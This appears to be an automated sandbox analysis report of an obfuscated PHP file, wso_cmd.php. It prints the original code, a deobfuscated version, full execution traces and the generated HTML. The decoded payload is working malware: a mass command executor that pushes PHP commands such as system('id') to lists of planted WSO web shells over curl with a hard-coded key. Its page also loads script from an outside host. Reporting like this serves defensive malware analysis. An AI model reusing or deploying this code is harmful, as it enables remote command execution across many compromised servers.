wso_cmd.php

md5: 37c327e9626364a885d9c0ccd02797b4

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Deobfuscated, Original, Traces)
base64_encode (Traces)

Environment
error_reporting (Deobfuscated, Original, Traces)
getcwd (Deobfuscated, Original, Traces)

Execution
eval (Deobfuscated, Original, Traces)
system (HTML, Traces)

Input
_POST (Traces)

URLs
http://www.r57.gen.tr/yazciz/ciz.js (HTML, Traces)

Deobfuscated PHP code
<?php

error_reporting(0);
function e7061($e)
{
    $ed = base64_decode($e);
    $n = openssl_decrypt("{$ed}", "AES-256-CBC", "1234567891234567", 0, "1234567891234567");
    return $n;
}
$Fls = 'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBtwsheSUIpUciiUW6BtdFY5J7hRbY9o60MXf7QOpkGiC7eOlnUTqrmL7U3sn%2BktbpSrjuauV2tCUEmU4M%2BxQ9upE9mw9NbLtHZbo2YqMamXuSeT%2B7dDZj8lHKtz%2FvnS8mQ%2BwlVMtPodVkUXO%2FBhp6S04FLIHtonArtEGp%2FD7snfmgCf4inQH%2BxKQe3t%2F9F8fbOcx%2B0szsPn8GJ4AR3Uxg2%2FZEsA3KtB3ze83EfjHdq7b0Wqg0z1HipeptW97gisBTWmR%2BKDD2wow2ixlH65vFqnNkY5og4TwQGqs6THYU0LqIg0yBLFAwC4%2FYOE62mzhmqSGsB0wOGL23YcnxRXjCzJUzUITuZg%2BrtzyAP7Gga%2BpDBqjbZbjvZEUn4NBhjO8WzMcAo1ep7gwLKZ4%2BNmi6r7ZM77rr43sR%2FzzJZ0eU8af76nMdgFe8lRWwFVcHPcMEwE312N8CzNzghci21ZuqjS0qQrxnkx50o6fiBvbPNun4cdoXlucG0wl9Bm%2BwjHZNqu3lXr2D60PcJwJkxvo6RffmT3b%2BJgewozG%2B2pCW2bXp3tXTyPISeDnB89FKTriDyZbIOG003Nk%2F0fdxjR7HSDeYLW5U%2FJF8DGe%2F3ZSHEOsXYOqqALpDjGVQp7Dn3uIt1BC1d5dCiynGNYDTWdMA6eerM%2FDzdRWRmKw%2BzKSTI4BGvv5OhneCfiXek59qPP%2Fr%2FPBT8exCXJMYvMlPuXbk78x%2BbbNepaRx2PH63U8NvLsrVFM9DRSGTC%2F9DJxX0H%2F4CePOKUZ1KzuOxZnirHi%2BgCtz1e0eryH2NRXzXrMb43cY7%2FHGr9Wb9qi4nltwFFseIJ8pLUnoeP45Hzb%2BPw5xOdr2w3%2BO2vxn%2BS9V9h2uWNqSyfN%2BpzE8GeLyZvdoU48%2BUH15uiV76j5M49I%2BdVviFshcnXw8z6XJ74zyeUjH3nUd0z3uS550DMEPc7NvVlx%2F5SgN3n2hyPrb5DA%2FCDU1Ap6nw%2BQ7dJh0N7PH%2BtF4Jhi06swG4sJ6v0Rcqzc2S1qaW%2FlwX5TOuFa%2FehrqUZ5bdyxmsjjH3%2B8d7p08vMcAP1AvYyNtZ%2F4R%2BgJJGOOJKXybf1gwEKOckd1eH9zUAp5htey53q6jMNMLUJxyeTNG76gf6bOW90rr9nL6iHzg8pIopXt3Jem1T5r6yTD1zh9vbdxDLohtbmPVq91jNq4571C5bGceUJptHrgl1KCD8Js%2FG247vKK2dSILs9wXPTjowwmjY5%2Bon4JxDgl9o8hNzXfl0b1wPMw0ilTf3rujwd%2BuhCeaDqS6cmmnvSD11zmOy7k%2F73bxfS4N1Gb99DfRtqijHo7o09GF%2FpMSpL7d6LiDyIiwxV9lSSp5pD4O2QOJn9uPPZJDhIhTj%2FAh4VAXgqdD3N54HtTpJatLEyqLmwi3D9oQi2L%2BD5RKPSwTOdL%2BagPjyeV9fL4NqpHxz2Pq2JNqW7Y4pK4QqyaBP85HZHamOptP81pMcxRIJ%2Bhz7rHbOZA1qxkNfRNjaBXxbcIZio7NXN0mN0Zz50Yfae1J%2FB7WZdYb41s79rgVWwg1%2BQB7MfHbWnYX9m6w%2Fx1hrwEtYFh5YlAq2xr0%2B%2FqYdm9%2FBjsUv62%2FXGyMMBuLqy1SbHOZxFmf%2Bu37b%2B2hcU3ixD%2BfByro7wmY61I33kN%2Fu9zyZ9htgTfxppFqIFVo5NNYHnZc8SaNHL9rs7EIqJqi5RwfGvjD3xUh4kN6KbYglnQxhBHnCbUq8ghr2aQDPwVckzR5gQ68x1jQn%2Bik7uEmhp9wMze6HFsc9ARgb%2FP0zCJiU3KNpeF7H17RoC0tkeQ2xmh3ltDPkOa1%2FWQs0fdh5o8qQFC6wtNryI1tY3x5D1La5939v6o9H3Mk49L6AJ1MJ3Y5gEjxHTp8Gr2ljCnX6PVpdGxeycg2xR1nahmTkSWf5Gy32AhZD1c15efIjmq5hWyw6sPtfTbic%2Bl2rujfvGk9Au7Z9dv2blu6gQ7w9E1IiDLokvSPOvyOVp7QAPqVtV9y%2Ba2wCoKn52N8H6b6a2btohIW38m%2B8OmttSmjErPmeXQ18z5zNjsywJpLnxz0fk9Y8%2BU3Dguy74Wsn2SfwtOZg69%2BIX3rn1%2FjY5orUD%2BMtoaRcfnR%2FCbxZDP6TOZIKfcAkeMg8zMsRuDbXDKZzOWC09ctnbu4vvKl3pQ9Ok790vI8xqrc4jT30lAW1uMe%2Fraq827Abmjw4RqcRyt2LkOySNJBdsWApuTIsAEdCv4GdWqyMJsUfAzomZOauTLOAZtDeY9%2FyHs8JFx%2Br7BMZsHId%2BzetBh1Nbz4gr5I%2B1kCzk%2Bdy4Xl3vTfy%2B8DbhXqJrxWWKv0Qt8c23jivsK%2BMMsgrzkO8q%2FY%2Fb%2F2XAdSGLRnK8hdv70rP9Yd%2Bgvwg0VIPfMw8GnBN%2BNBa6f7MfBhg66y2kNshdNLFLWv8h7h%2FWrRptLujlnmwfQH%2FpW2%2BdlqPDHPsl95msjzxCbZRcje2deRq6ZR5u07GmckOhl4rnx7QL62bvYv0voDPKv4FvP9gJdUq%2F6N96tr8t6MY7paex2eXE6P%2Bwdj52NnEO56UF5HVYXbTzzs4%2BxDOMzkOHMxfFvzP%2Ba3BaDPy4vo7m7YlgHo97ygb488sl%2BVoBcXLMYgHmLx9zL87SM1pFzF8b1hfGEGfYcDHP7aL%2B%2Bnrx7kMOTxGQ6r7yYWVqefGZgM2cKs627vHhOk%2BM9V688N2nrFqsVqI0d3i8z2ms2P6KqwdF8mDt4zj1th%2F4%2BMYY%2B%2F5jkvNZyXNjZL7089wT9DHv3HbGMNp0sGOREYrDh81nZ48xoMXkOLKepaeAuhfceu57HtMZN5shxrdL5ubClLABRVpPYM3YmNsaNrqAXBT%2BatTHfx%2FP0zBH6AIijJg%2BmeIst9n8BXe%2Bg%2FyAiNf6RvvUf6P%2FqvGx6z76vMVvm33%2F%2FD%2FTvVMI%3D';
if (!function_exists('openssl_decrypt')) {
    die('<h2>Function openssl_decrypt() not found !</h2>');
}
if (!defined('_FILE_')) {
    define("_FILE_", getcwd() . DIRECTORY_SEPARATOR . basename($_SERVER['PHP_SELF']), false);
}
if (!defined('_DIR_')) {
    define("_DIR_", getcwd(), false);
}
$e7091 = "WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno=";
eval(e7061($e7091));
Execution traces
data/traces/37c327e9626364a885d9c0ccd02797b4_trace-1676249657.6871.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:54:43.584920]
1	0	1	0.000167	393528
1	3	0	0.000264	403232	{main}	1		/var/www/html/uploads/wso_cmd.php	0	0
2	4	0	0.000282	403232	error_reporting	0		/var/www/html/uploads/wso_cmd.php	1	1	0
2	4	1	0.000297	403272
2	4	R			22527
1		A						/var/www/html/uploads/wso_cmd.php	1	$Fls = 'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBt'
2	5	0	0.000341	403232	function_exists	0		/var/www/html/uploads/wso_cmd.php	1	1	'openssl_decrypt'
2	5	1	0.000356	403272
2	5	R			TRUE
2	6	0	0.000370	403232	getcwd	0		/var/www/html/uploads/wso_cmd.php	1	0
2	6	1	0.000384	403280
2	6	R			'/var/www/html/uploads'
2	7	0	0.000399	403280	basename	0		/var/www/html/uploads/wso_cmd.php	1	1	'/uploads/wso_cmd.php'
2	7	1	0.000414	403352
2	7	R			'wso_cmd.php'
2	8	0	0.000428	403296	define	0		/var/www/html/uploads/wso_cmd.php	1	3	'_FILE_'	'/var/www/html/uploads/wso_cmd.php'	FALSE
2	8	1	0.000443	403448
2	8	R			TRUE
2	9	0	0.000456	403328	getcwd	0		/var/www/html/uploads/wso_cmd.php	2	0
2	9	1	0.000469	403376
2	9	R			'/var/www/html/uploads'
2	10	0	0.000483	403376	define	0		/var/www/html/uploads/wso_cmd.php	2	3	'_DIR_'	'/var/www/html/uploads'	FALSE
2	10	1	0.000497	403528
2	10	R			TRUE
1		A						/var/www/html/uploads/wso_cmd.php	2	$e7091 = 'WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno='
2	11	0	0.000531	403408	e7061	1		/var/www/html/uploads/wso_cmd.php	2	1	'WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno='
3	12	0	0.000551	403408	base64_decode	0		/var/www/html/uploads/wso_cmd.php	1	1	'WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno='
3	12	1	0.000570	403664
3	12	R			'Z+QT4eNuuRIb0jKvwQoSP1nG+MDINg8dEaaHsw/N3W+NxAj3B0ygi3qgqGv0ZiS0ME0DD96VUgNqK5HBBqGOsBQi55NX4xT4iaLMN1s5YGbcYl2yRSDRONZrtLi7UY2z'
2		A						/var/www/html/uploads/wso_cmd.php	1	$ed = 'Z+QT4eNuuRIb0jKvwQoSP1nG+MDINg8dEaaHsw/N3W+NxAj3B0ygi3qgqGv0ZiS0ME0DD96VUgNqK5HBBqGOsBQi55NX4xT4iaLMN1s5YGbcYl2yRSDRONZrtLi7UY2z'
3	13	0	0.000610	403632	openssl_decrypt	0		/var/www/html/uploads/wso_cmd.php	1	5	'Z+QT4eNuuRIb0jKvwQoSP1nG+MDINg8dEaaHsw/N3W+NxAj3B0ygi3qgqGv0ZiS0ME0DD96VUgNqK5HBBqGOsBQi55NX4xT4iaLMN1s5YGbcYl2yRSDRONZrtLi7UY2z'	'AES-256-CBC'	'1234567891234567'	0	'1234567891234567'
3	13	1	0.000648	403960
3	13	R			'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'
2		A						/var/www/html/uploads/wso_cmd.php	1	$n = 'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'
2	11	1	0.000684	403568
2	11	R			'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'
2	14	0	0.000715	405344	eval	1	'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'	/var/www/html/uploads/wso_cmd.php	2	0
3	15	0	0.000732	405344	urldecode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBt'
3	15	1	0.000769	409472
3	15	R			'eNqlWVm3msgW/ksMmtU+9ENUQDHUCQVVDG8C5wQFPAZRhF9/dxWzmu6+yUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ/i08FC4R/sqJFKeBVuZoNUuNRLmOaQGNm6+l2d6hyU5Sr/6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J/tLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m/sOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C/RQTFhKTk70upNSgcsrp7fI3eaBHMGz+w1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL/tZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBtwsheSUIpUciiUW6BtdFY5J7hRb'
3	16	0	0.000804	409440	base64_decode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'eNqlWVm3msgW/ksMmtU+9ENUQDHUCQVVDG8C5wQFPAZRhF9/dxWzmu6+yUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ/i08FC4R/sqJFKeBVuZoNUuNRLmOaQGNm6+l2d6hyU5Sr/6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J/tLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m/sOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C/RQTFhKTk70upNSgcsrp7fI3eaBHMGz+w1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL/tZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBtwsheSUIpUciiUW6BtdFY5J7hRb'
3	16	1	0.000839	413568
3	16	R			'xڥYY���\026�K\f��>�CT@1�\t\005U\fo\002�\004\005<\006Q�_w\025����C-\020�=|{.u\033�u\033i�\026���T`-u[�`-���u\'�q(\033�),�M�7�*TGA�*��\t�-<\024.\021�ʉ\024��V�h5K�D��i\001�����ޡ�NR���@��ӝ�����x\033k\017�y��V�;A���o\t��өH�W�4��쵴މ�\030fi\031�\n1�\030m.O\034��3���{\006�d��2>\aY�{�<a�\002y��\016\026=I\025����9e\036nh\025j��w�<��w\v�PLXJNN�R��+�����\034���\rh\\��\017d`��L�������a�aY��9\005�<��d\035dZނ\023:{Yzٻx��.�5\002r�\017\0019�<��\024�z\016�\006l�H�5�s9©\002�\024[��\023��$�\r\006�,��'
3	17	0	0.000924	409440	gzuncompress	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'xڥYY���\026�K\f��>�CT@1�\t\005U\fo\002�\004\005<\006Q�_w\025����C-\020�=|{.u\033�u\033i�\026���T`-u[�`-���u\'�q(\033�),�M�7�*TGA�*��\t�-<\024.\021�ʉ\024��V�h5K�D��i\001�����ޡ�NR���@��ӝ�����x\033k\017�y��V�;A���o\t��өH�W�4��쵴މ�\030fi\031�\n1�\030m.O\034��3���{\006�d��2>\aY�{�<a�\002y��\016\026=I\025����9e\036nh\025j��w�<��w\v�PLXJNN�R��+�����\034���\rh\\��\017d`��L�������a�aY��9\005�<��d\035dZނ\023:{Yzٻx��.�5\002r�\017\0019�<��\024�z\016�\006l�H�5�s9©\002�\024[��\023��$�\r\006�,��'
3	17	1	0.001042	417664
3	17	R			'JTNDJTNGcGhwJTBEJTBBJTJGJTJBJTBEJTBBJTBEJTBBK01hc3MrQ09NTUFORCtFWENVVEVSK0ZvcitXU08rU2hlbGwrNC4lMkEuJTJBJTBEJTBBK01vZGlmaWVkK2FuZCtNYWRlK29uKzI2JTJGMDYlMkYyMDE5K0J5K0RhbWFuZUR6JTBEJTBBKyUwRCUwQStUaGlzK1NjcmlwdCt1c2VkK2ZvcithdXRob3JpemVkK3Rlc3RpbmcrYW5kJTJGb3IrZWR1Y2F0aW9uYWwrcHVycG9zZXMrb25seS4lMEQlMEErUnVuK2l0K29uK3lvdXIrb3duK2xvY2FsaG9zdCtvcit5b3VyK3NlcnZlci4lMEQlMEErSSt0YWtlK25vK3Jlc3BvbnNpYmlsaXR5K2Zvcit0aGUrYWJ1c2Urb2YrdGhlK3NjcmlwdC4lMEQlMEErJTBEJTBBK05vdGVzJTNBJTBEJTBBKyUyQStET04lMjd0K0NIQU5HRStUSEUr'
3	18	0	0.001078	413536	base64_decode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'JTNDJTNGcGhwJTBEJTBBJTJGJTJBJTBEJTBBJTBEJTBBK01hc3MrQ09NTUFORCtFWENVVEVSK0ZvcitXU08rU2hlbGwrNC4lMkEuJTJBJTBEJTBBK01vZGlmaWVkK2FuZCtNYWRlK29uKzI2JTJGMDYlMkYyMDE5K0J5K0RhbWFuZUR6JTBEJTBBKyUwRCUwQStUaGlzK1NjcmlwdCt1c2VkK2ZvcithdXRob3JpemVkK3Rlc3RpbmcrYW5kJTJGb3IrZWR1Y2F0aW9uYWwrcHVycG9zZXMrb25seS4lMEQlMEErUnVuK2l0K29uK3lvdXIrb3duK2xvY2FsaG9zdCtvcit5b3VyK3NlcnZlci4lMEQlMEErSSt0YWtlK25vK3Jlc3BvbnNpYmlsaXR5K2Zvcit0aGUrYWJ1c2Urb2YrdGhlK3NjcmlwdC4lMEQlMEErJTBEJTBBK05vdGVzJTNBJTBEJTBBKyUyQStET04lMjd0K0NIQU5HRStUSEUr'
3	18	1	0.001123	421760
3	18	R			'%3C%3Fphp%0D%0A%2F%2A%0D%0A%0D%0A+Mass+COMMAND+EXCUTER+For+WSO+Shell+4.%2A.%2A%0D%0A+Modified+and+Made+on+26%2F06%2F2019+By+DamaneDz%0D%0A+%0D%0A+This+Script+used+for+authorized+testing+and%2For+educational+purposes+only.%0D%0A+Run+it+on+your+own+localhost+or+your+server.%0D%0A+I+take+no+responsibility+for+the+abuse+of+the+script.%0D%0A+%0D%0A+Notes%3A%0D%0A+%2A+DON%27t+CHANGE+THE+USER+AGENT+VALUE.%0D%0A+%2A+DON%27T+CHANGE++THIS+VALUE%3A+130a06df177c97a2e2b12b5a17719ce1.%0D%0A%2A%2F%0D%0A+%0D%0A%2F%2F+This+'
3	19	0	0.001157	413536	urldecode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'%3C%3Fphp%0D%0A%2F%2A%0D%0A%0D%0A+Mass+COMMAND+EXCUTER+For+WSO+Shell+4.%2A.%2A%0D%0A+Modified+and+Made+on+26%2F06%2F2019+By+DamaneDz%0D%0A+%0D%0A+This+Script+used+for+authorized+testing+and%2For+educational+purposes+only.%0D%0A+Run+it+on+your+own+localhost+or+your+server.%0D%0A+I+take+no+responsibility+for+the+abuse+of+the+script.%0D%0A+%0D%0A+Notes%3A%0D%0A+%2A+DON%27t+CHANGE+THE+USER+AGENT+VALUE.%0D%0A+%2A+DON%27T+CHANGE++THIS+VALUE%3A+130a06df177c97a2e2b12b5a17719ce1.%0D%0A%2A%2F%0D%0A+%0D%0A%2F%2F+This+'
3	19	1	0.001223	421760
3	19	R			'<?php\r\n/*\r\n\r\n Mass COMMAND EXCUTER For WSO Shell 4.*.*\r\n Modified and Made on 26/06/2019 By DamaneDz\r\n \r\n This Script used for authorized testing and/or educational purposes only.\r\n Run it on your own localhost or your server.\r\n I take no responsibility for the abuse of the script.\r\n \r\n Notes:\r\n * DON\'t CHANGE THE USER AGENT VALUE.\r\n * DON\'T CHANGE  THIS VALUE: 130a06df177c97a2e2b12b5a17719ce1.\r\n*/\r\n \r\n// This function was written line by line !\r\n\r\nfunction encrypt_x($str'
3	20	0	0.001397	431760	eval	1	'?><?php\r\n/*\r\n\r\n Mass COMMAND EXCUTER For WSO Shell 4.*.*\r\n Modified and Made on 26/06/2019 By DamaneDz\r\n \r\n This Script used for authorized testing and/or educational purposes only.\r\n Run it on your own localhost or your server.\r\n I take no responsibility for the abuse of the script.\r\n \r\n Notes:\r\n * DON\'t CHANGE THE USER AGENT VALUE.\r\n * DON\'T CHANGE  THIS VALUE: 130a06df177c97a2e2b12b5a17719ce1.\r\n*/\r\n \r\n// This function was written line by line !\r\n\r\nfunction encrypt_x($str,$pwd){\r\n$pwd=base64_encode($pwd);\r\n$str=base64_encode($str);\r\n$enc_chr="";\r\n$enc_str="";\r\n$i=0;\r\nwhile($i<strlen($str)){\r\nfor($j=0;$j<strlen($pwd);$j++){\r\n$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));\r\n$enc_str.=$enc_chr;\r\n$i++;\r\nif($i>=strlen($str))break;\r\n}\r\n}\r\nreturn base64_encode($enc_str);\r\n}\r\n\r\n// This function has no role in this script !\r\n\r\nfunction decrypt($str,$pwd){\r\n\t$pwd=base64_encode($pwd);\r\n\t$str=base64_decode($str);\r\n\t$enc_chr="";\r\n\t$enc_str="";\r\n\t$i=0;\r\n\twhile($i<strlen($str)){\r\n\tfor($j=0;$j<strlen($pwd);$j++){\r\n\t$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));\r\n\t$enc_str.=$enc_chr;\r\n\t$i++;\r\n\tif($i>=strlen($str))break;\r\n\t}\r\n\t}\r\nreturn base64_decode($enc_str);\r\n}\r\n\r\nfunction curl($url,$eval){\r\n$host=parse_url($url);\r\n$md5host=md5($host[\'host\']);\r\n$p1_encrypted= encrypt_x($eval,"130a06df177c97a2e2b12b5a17719ce1");\r\n$paramsPost = array("a"=>"GBMlAA==","p1"=>"{$p1_encrypted}","charset"=>"UTF-8","p2"=>"","c"=>"AWcfAzoXeQ8=","p3"=>"","ajax"=>"true",);\r\n$ch=curl_init();\r\ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\ncurl_setopt($ch, CURLOPT_HEADER, 0);\r\ncurl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0");\r\ncurl_setopt($ch, CURLOPT_URL, $url);\r\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($ch, CURLOPT_COOKIE, "{$md5host}key=130a06df177c97a2e2b12b5a17719ce1");\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, $paramsPost);\r\ncurl_setopt($ch, CURLOPT_TIMEOUT, 30);\r\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n$f = curl_exec($ch);\r\npreg_match("#innerHTML=\'(.*?)\';#i",$f,$x);\r\nreturn array($host[\'host\'], $x[1]);\r\ncurl_close($ch);\r\n}\r\n\r\nprint \'\r\n<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>\r\n<center><form method="POST">\r\n<p><span style="font-size: 20pt"><font color="#c41013">WSO Shell</font> Command Excuter</span></p>\r\n<p>Shells (<font color="#c41013">That you want to run command from it !</font>)<br><textarea rows="22" name="shells" cols="48">\'.$shells.\'</textarea></p>\r\n<p><font color="#c41013">Command: </font><br><input type="text" value="system(\\\'id\\\');" name="cmd"></p>\r\n<p><input type="submit" value="Excute" name="exec"></p>\r\n</form></center>\';\r\n\r\nif(isset($_POST["exec"])){\r\nforeach(explode("\\n",$_POST[\'shells\']) as $shell){\r\n$result = curl(trim($shell),trim($_POST[\'cmd\']));\r\n$result= str_replace(array(\'\\n\',\'\\r\'),array("<br>","") , $result);\r\nif(!empty($result[0]) && !empty($result[1])){\r\nprint "THE HOST: ".$result[0]."<br>";\r\nprint "THE EXEC RESULT: ".$result[1]."<br>";\r\n}\r\n}\r\n}\r\n;?><?php '	/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	0
3	20	1	0.001498	431760
2	14	1	0.001507	426312
1	3	1	0.001515	424456
			0.001554	341144
TRACE END   [2023-02-12 22:54:43.586339]

Generated HTML code
<html><head><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script>
</head><body><center><form method="POST">
<p><span style="font-size: 20pt"><font color="#c41013">WSO Shell</font> Command Excuter</span></p>
<p>Shells (<font color="#c41013">That you want to run command from it !</font>)<br><textarea rows="22" name="shells" cols="48"></textarea></p>
<p><font color="#c41013">Command: </font><br><input type="text" value="system('id');" name="cmd"></p>
<p><input type="submit" value="Excute" name="exec"></p>
</form></center></body></html>
Original PHP code
<?php error_reporting(0); function e7061($e){$ed = base64_decode($e);$n = openssl_decrypt("$ed","AES-256-CBC","1234567891234567",0,"1234567891234567");return $n;}$Fls = 'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBtwsheSUIpUciiUW6BtdFY5J7hRbY9o60MXf7QOpkGiC7eOlnUTqrmL7U3sn%2BktbpSrjuauV2tCUEmU4M%2BxQ9upE9mw9NbLtHZbo2YqMamXuSeT%2B7dDZj8lHKtz%2FvnS8mQ%2BwlVMtPodVkUXO%2FBhp6S04FLIHtonArtEGp%2FD7snfmgCf4inQH%2BxKQe3t%2F9F8fbOcx%2B0szsPn8GJ4AR3Uxg2%2FZEsA3KtB3ze83EfjHdq7b0Wqg0z1HipeptW97gisBTWmR%2BKDD2wow2ixlH65vFqnNkY5og4TwQGqs6THYU0LqIg0yBLFAwC4%2FYOE62mzhmqSGsB0wOGL23YcnxRXjCzJUzUITuZg%2BrtzyAP7Gga%2BpDBqjbZbjvZEUn4NBhjO8WzMcAo1ep7gwLKZ4%2BNmi6r7ZM77rr43sR%2FzzJZ0eU8af76nMdgFe8lRWwFVcHPcMEwE312N8CzNzghci21ZuqjS0qQrxnkx50o6fiBvbPNun4cdoXlucG0wl9Bm%2BwjHZNq